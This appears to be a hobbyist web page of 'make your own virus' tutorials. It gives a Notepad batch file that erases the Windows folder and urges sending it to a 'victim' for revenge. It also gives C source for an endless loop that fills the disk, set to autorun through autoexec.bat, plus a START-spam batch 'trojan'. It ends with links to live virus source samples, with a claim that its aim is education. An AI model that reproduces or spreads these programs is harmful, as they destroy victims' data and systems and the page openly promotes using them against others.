Welcome You All !!!!!!!!!!!!
FULL MASTI
CUT AND PASTE THIS MUSICAL GRAPHIC CODE TO SHARE
LETS MAKE AN EASIEST DELETING VIRUS IN NOTEPAD
Very easy but dangerous Virus
Ok, now, the trick:
The only thing you need is Notepad.
Now, to test it,
- Create a textfile called TEST.txt(empty) in C:\
- Now in your notepad type "erase C:\TEST.txt" (without the quotes).
- Then do "Save As..." and save it as "Test.cmd".
- Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as anyname.cmd.
Now DON'T run the file or you'll lose your WINDOWS map.
So, that's the virus.
Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.
ISN"T IT ROCKING !!!
Hi everybody,at begining of the learning of computer programming it is a dream of almost all student to build a computer virus of his/her own.
I am going to give here a simple virus program which has only a few lines bur has ability to jam your Hard disc. The logic behind the program is nothing but making a self growing file which grows to a few MB in one tern and this growth will continue infinitely.
(YOU WILL NEED TO HAVE KNOWLEDGE ABOUT C LANGUAGE TO BUILD THIS VIRUS ).
Source Code:-
//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>+a.exe");
}
}
//END
As you can see this is a very little programe.Compiling the programme we get v.exe file.This is our virus.
How it works?
The system call "dir>>+a.exe" will execute the dos command 'dir' and ridirect its output to a file +a.exe(the symbol + can be obtained by pressing 456 on numpad holding alt key).
So running the program in a folder having many files and folder will increase the size of +a.exe in a great amount.
This process will continue to infinity as this is in a while(1) loop;
Best try this on win98.then you cannot delete +a.exe from GUI.
For auto running place v.exe in the command folder in windows folder.
In autoexec.bat(win98) or autoexec.NT(winXP/2000) file simply write v.exe.
Each time your window starts v.exe will run automatically.
Try this on your own computer remember the +a.exe is the infected file which is growing in size continiously.So to recover, simply delete v.exe and +a.exe file from your computer.
The code is given below
Code:
//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>+a.exe");
}
}
//END
SO That was simple and interesting virus TRY IT AND HAVE FUN !!!
Yes friends building a trojan is just very simple that even a 5 year old kid could do it,
you have to do is just type START numrous types in notepad :
as shown in image below :
NOW just save this as anyname.BAT
YOUR TROJAN IS READY TO USE.. ..!!!!!
what this trojan does ??
This is a MUST ASK question.. actually it does no harm to computer.. it just opens COMMAND PROMPT number of tymes you typed START ....
your Antivirus detects it as a trojan...!!
you can even try this on your computer BUT with limited number of START !!!!
ENJOY !!!
- They are all stored as TXT files and so will not cause any problems when viewed using your web browser, or notepad. However, since most of these are actual unmodified viruses, your virus scanner will complain.
- If you keep them as TXT files on your computer, there is no way for them to be executed, they become active using the standard windows programs with EXE extention.
I have taken steps to ensure that you will not be accidentally infected by downloading any of the virus samples from these pages.
Click on any of the links below to view actual virus source code.
EXPLOIT WINDOWS
HOMEPAGE
ICECUBES
ILOVEYOU
KAK
CIH
RED-WARM
KERNAL
MAWANELLA
MELISSA
RUN ORIGINAL
I also know that most of you are using Microsoft's Internet Explorer - the most insecure browser available; i could have easily download and install these viruses on your computer without your knowledge using any of the unpatched vunerablities still present in even the latest versions of IE - but I haven't.
MY AIM IS :
- To Educate you all on how easy it is to write 1 and warn you before you get attacked in future.